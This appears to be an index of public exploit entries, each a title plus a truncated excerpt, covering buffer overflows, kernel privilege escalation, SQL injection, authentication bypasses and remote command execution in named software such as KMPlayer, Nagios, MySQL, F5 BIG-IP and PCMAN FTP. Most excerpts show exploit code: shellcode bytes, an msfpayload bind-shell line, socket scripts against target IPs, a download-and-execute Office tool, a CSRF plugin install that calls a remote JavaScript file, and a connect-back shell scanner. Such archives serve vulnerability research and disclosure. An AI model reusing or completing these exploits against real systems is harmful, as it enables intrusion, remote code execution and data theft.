Gold-MP4-Player-3.3
Exploit Title: GoldMP4Player Buffer Overflow (SEH) Software Link: http://download.cnet.com/GoldMP4Player/3000-21394-10967424.html Version: 3.3 Date: 27.02.2014 head = "http://" buff = "\x41" * 253 # shell calc.exe buff += "ëÿÿœ¼‰áÛÖÙqôZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8"...
VCDGear-3.50---(.cue)
Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will...
KMPlayer-3.8.0.117
KMPlayer 3.8.0.117 Buffer Overflow Author: metacom Tested on: Windows XP Pro SP3 En Download link: http://www.chip.de/downloads/KMPlayer33859258.html Version: 3.8.0.117 Kmp Plus import struct def littleendian(address): return struct.pack("L", address) junk = "\x41" * 250 eip = littleendian(0x7C86467B)...
MP3Info-0.8.5a---SEH
The address of the process memory region starts with a null byte, but exploitation is still possible because of the little-endian architecture, provided that the return address is placed at the end of the buffer; this, however, confines us to the tiny 4-byte area after pop/pop/retn. Using a couple of trampolines I...
AudioCoder-0.8.29
Exploit Title: AudioCoder-0.8.29 Memory Corruption to Code Execution (SEH) Author: sajith Version: AudioCoder-0.8.29 Vulnerable app link: http://www.mediacoderhq.com import struct raw_input("Letz start fuzzing") print "POC by sajith shetty" try: f = open("victim.m3u","w") header = "http://" buffer = 5000...
Windows-XP-SP3---BthPan.sys
Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt from ctypes import * from struct import pack from os import getpid,system from sys...
Symantec-Endpoint-Protection-11.x,-12.x
Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow http://www.offensive-security.com Tested on Windows 7 http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/ Authors: Matteo ryujin Memelli, Alexandru sickness Uifalvi offensive-security.com from ctypes import * fro...
BlazeDVD-Pro-7.0---(.plf)
BlazeDVD Pro v7.0 - .plf Stack Based Buffer Overflow (direct RET) - ASLR/DEP bypass on Win8.1 Pro Date: Mon, Aug 11 2014 12:58:06 GMT Exploit Author: Giovanni Bartolomucci Vendor Homepage: http://www.blazevideo.com/ Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe Version:...
Savant-Web-Server-3.1
import socket targetaddress = "10.10.10.129" targetport = 80 buffer2 = "R0cX" + "R0cX" # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c buffer2 += "\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"...
Adobe-Flash-Player-SequenceParameterSetNALUnit
Abysssec Public Exploit CVE-2011-2140 This exploit tested on Adobe Flash Player 10.3.181.34 XP sp3 contact : info at abysssec.com...
Sysax-File-Rename-BoF
Tested on: XP SP3 32bit and Server 2003 SP2 32bit (No DEP) Software Versions Tested: 5.50 and 5.52 Date Discovered: February 1, 2012 Vendor Contacted: February 3, 2012 Vendor Response: none import socket,sys,time,re,base64 if len(sys.argv) != 6: print "[+] Usage: ./filename " sys.exit(1) target = sys.argv[1]...
NetDecision-Traffic-4.5.1
Title : Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability Author : Prabhu S Angadi SecPod Technologies www.secpod.com Vendor : http://www.netmechanica.com Advisory : http://secpod.org/blog/?p=481...
NetDecision-Dashboard-1.0
Author : Prabhu S Angadi SecPod Technologies www.secpod.com Vendor : http://www.netmechanica.com Advisory : http://secpod.org/blog/?p=478 http://secpod.org/advisories/SecPodNetmechanicaNetDecisionDashboardServerInfoDiscVuln.txt...
MailMax-4.6-POP3-
MailMax v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed) Newer versions not tested, maybe vulnerable too. A hard one this: the shellcode MUST be lowercase. Plus there are many opcodes that break the payload and opcodes that get changed, like "\xc3" gets converted to "\xe3", and...
sysax--5.57-Directory-Traversal
Title: Sysax Multi Server 5.57 Directory Traversal Tool (Post Auth) Tested on: XP SP3 32bit and Server 2003 SP2 32bit Date Discovered: March 27, 2012 Vendor Contacted: March 29, 2012 Vendor Response: April 3, 2012 Vendor Fixed: Currently working on fix, check my site for update import...
Solarwinds-Storage-Manager-5.1.0
Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit Date: May 2nd 2012 Author: muts Version: SolarWinds Storage Manager 5.1.0 Tested on: Windows 2003 Archive Url : http://www.offensive-security.com/0day/solarshell.txt import urllib, urllib2, cookielib import sys...
HP-VSA-Remote-Execution
HP VSA / SANiQ Hydra client Nicolas Grégoire [email protected] v0.5 HOST = '192.168.201.11' # The remote host PORT = 13838 # The hydra port import getopt import re import sys import binascii import struct import socket import os ''' ================================== Define functions...
MySQL-Remote-Root-Authentication-Bypass
This has to be the easiest "exploit" ever. Seriously. Embarrassed to submit this a little. Title: MySQL Remote Root Authentication Bypass Written by: Dave Kennedy ReL1K http://www.secmaniac.com import subprocess ipaddr = raw_input("Enter the IP address of the mysql server: ") while 1:...
F5-BIG-IP-Remote-Root
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py) Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file("priv.key", "w") filewrite.write("""-----BEGIN RSA PRIVATE KEY-----...
XM-Easy-Personal-FTP-Server
Because this address is relative and has a static base in this environment, I was able to use the heap chunk address as the pointer to write at the vtable. Then a function is called at offset 0xb0 or 0x98 and we can reliably return into a ROP payload and execute arbitrary code. import socket impo...
ALLMediaServer-0.8-SEH
Exploit Title: seh exploit, BOF Date: 04/07/2012 Exploit Author: motaz reda Software Link: http://allmediaserver.org/ Version: ALLMediaServer 0.8 Tested On: Windows 7 ultimate...
Atmail-Email-Server-6.4
By sending an email to a user with the Atmail administrative interface open, we can call a remote JavaScript file that will initiate the installation of a specially crafted plugin file via CSRF, enabling remote code execution on the Atmail server. import smtplib, urllib2, sys def sendMaildstemail...
Symantec-Web-Gateway-5.0.3.18
06 Jun 2012: Vulnerability reported to CERT 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012 26 Jun 2012: Email received from Symantec for additional information 26 Jun 2012: Additional proofs of concept sent to Symantec 06 Jul 2012: Update received from Symantec...
Sitecom-MD-25x
Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version: 2.4.17 and below...
QNX--6.5.0-QCONN-1.4.207944
Title : QNX QCONN Remote Command Execution Vulnerability Version : QNX 6.5.0 QCONN 1.4.207944 Download: http://www.qnx.com/download/feature.html?programid=23665 QNX Neutrino 6.5.0 SP1 Vendor : http://www.qnx.com import telnetlib import sys if len(sys.argv) " print " + Ex QCONNRC.py 192.168.0.1 8000...
ManageEngine-5.5
The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse, the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user, which makes a remote shell with root/SYSTEM privileges...
Freefloat-FTP-Server-PUT
In my disclosure to FreeFloat, I reported my discovery and notified them that other exploits for various FTP commands supported by the FreeFloat FTP existed on the internet, just to be sure they knew, as SecPod reported their findings last year. They responded and acknowledged my discovered...
BigAnt-Server-2.52-SP5-SEH
Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...
Novell-File-Reporter
Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability 0day CVE-2012-4959 @abysssec Well, just one more of our 0days got published after 2 years; here is the info: https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959 and here...
Ubiquiti-AirOS-5.5.2
The http://IP/test.cgi "essid" parameter is not sanitized, which allows execution of operating system commands. The parameter input can be like this to create a file /tmp/test.txt: LINKTEST /bin/touch /tmp/test.txt " import urllib, urllib2, cookielib, sys, random, mimetools,...
Nagios-history.cgi-Exec-Code
CVE-2012-6096 - Nagios history.cgi Remote Command Execution Another year, another reincarnation of classic and trivial bugs to exploit. This time we attack Nagios.. or more specifically, one of its CGI scripts. #!/usr/bin/python # CVE-2012-6096 - Nagios history.cgi Remote Command Execution...
Microsoft-Office-2010-Exec-Code
Exploit Title: MS Office 2010 Download Execute Google Dork: NA Date: 19 Feb 2013 Exploit Author: g11tch Vendor Homepage: Software Link: Version: ALL import binascii import sys import time print "Microsoft Office 2010, download -N- execute " print " What do you want to name your .doc ? " print "...
SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows
ActiveX Buffer Overflow in SkinCrafter3 vs2005 Affected version: 3.8.1.0 Vendor Homepage: http://skincrafter.com/ Software Link: skincrafter.com/downloads/SkinCrafterDemo20052008x86.zip The vulnerability lies in the COM component used by...
BigAnt-Server-2.97---DDNF
Title: BigAnt Server 2.97 DDNF Username Buffer Overflow Author: Craig Freyman @cd1zz http://pwnag3.com Tested on: Windows 7 64 bit DEP/ASLR Bypass...
MinaliC-Webserver-2.0.0
Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 import socket import struct # 74 bytes calc.exe from...
Windows-Light-HTTPD-0.1
Buffer overflow in Light HTTPd lhttpd 0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request. import urllib2 from time import sleep def targURL(): while True: URL = raw_input("\n Please enter the URL of the Light HTTP server you would like to PWN. Ex. http://192.168.1.1\n\n...
Bifrost-1.2.1-Remote-Buffer-OverFlow
Bifrost contains an overflow condition that is triggered as user-supplied input is not properly validated when handling specially crafted commands. This may allow a remote attacker to cause a buffer overflow, allowing the execution of arbitrary code. import socket from time import sleep from...
ASUS-RT-AC66U-acsd-Param
Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command Discovered and Reported: June 2013 Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ Independent Security Evaluators Software Vendor: http://asus.com Exploit/Advisory: http://securityevaluators.com,...
OpenCompact-Ftp-Server-1.2
Abusing authentication bypass in combination with a directory traversal to grab the sam file for offline cracking By Wireghoul - http://www.justanotherhacker.com Based on Serge Gorbunov's auth bypass http://www.exploit-db.com/exploits/13932/ Software Link: http://sourceforge.net/projects/open-ftp...
HP-Data-Protector-A.06.20
This script allows executing a command with an arbitrary number of arguments. The trick calls the 'perl.exe' interpreter installed with HP Data Protector inside the directory installpath/bin/. The main goal of the script is to bypass the limitation of executing only a single command without any...
Sami-FTP-Server-2.0.1---MKD
Exploit Title: Sami FTP MKD buffer overflow SEH + Bypass ASLR Date: 11 August 2013 Exploit Author: Christian Polunchis Ramirez https://intrusionlabs.org Vendor Homepage: http://www.karjasoft.com/old.php Version: Sami FTP Server 2.0.1 Tested on: Windows 7 Home Basic x86, Spanish import socket, sys,...
FiberHome-Modem-Router-HG-110
Exploit Title: Directory Path Traversal FiberHome Modem Router HG-110 / Remote Change DNS Servers Date: 22/09/2013 Exploit Author: Javier Perez - [email protected] - @thes41nt Vendor Homepage: http://hk.fiberhomegroup.com/ Version: HG110BHV1.6 import urllib import urllib2 ip = raw_input("Ent...
Apache-+-PHP-5.x
quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE : - for connect back shell start netcat/nc and bind port on given host:port - is ip-range scanner not is multithreaded, but iz multithreaded iz in random scanner and is scanner from file greets to MustLive - no ssl support - more php paths can be...
Ability-Mail-Server-2013
Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail. Exploit Title: Ability Mail Server 2013 Stored XSS Date: 12/20/2013 Exploit Author: David Um Vendor Homepage: http://www.code-crafters.com/ Software...
haneWIN-DNS-Server-1.5.3
Description: A SEH overflow occurs when a large amount of data is sent to the server Author: Dario Estrada dash https://intrusionlabs.org Date: 2014-01-29 Version: haneWIN DNS Server 1.5.3 Vendor Homepage: http://www.hanewin.net/ Vulnerable app link: http://www.hanewin.net/dns-e.htm import socket,...
PCMAN-FTP-2.07-CWD
Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv if len(argv) != 4: print "USAGE: %s host " % argv[0] exit(1) else: store...
PCMAN-FTP-2.07-ABOR
Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv if len(argv) != 4: print "USAGE: %s host " % argv[0] exit(1) else: store...
HP-Data-Protector-EXEC_BAR
The omniinet service, which runs by default on port 5555, is susceptible to numerous remotely exploitable vulnerabilities. By sending a malicious EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet service to run an arbitrary command. On Windows, the omniinet service is running as...
Ultra-Mini-HTTPD-1.21---POST
Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request Date: 16 Feb 2014 Exploit Author: Sumit Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on: Windows XP Professional SP3 A buffer overflow is triggere...
EudoraQualcomm-WorldMail-9.0.333.0
PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service Preauthentication Buffer Overflow. - Tested on: Windows Server 2003 SP1. - SEH gets overwritten at 749 bytes when using the UID command. Only 79 bytes are left after SEH, so the shellcode was placed before SEH and a backward jump is used...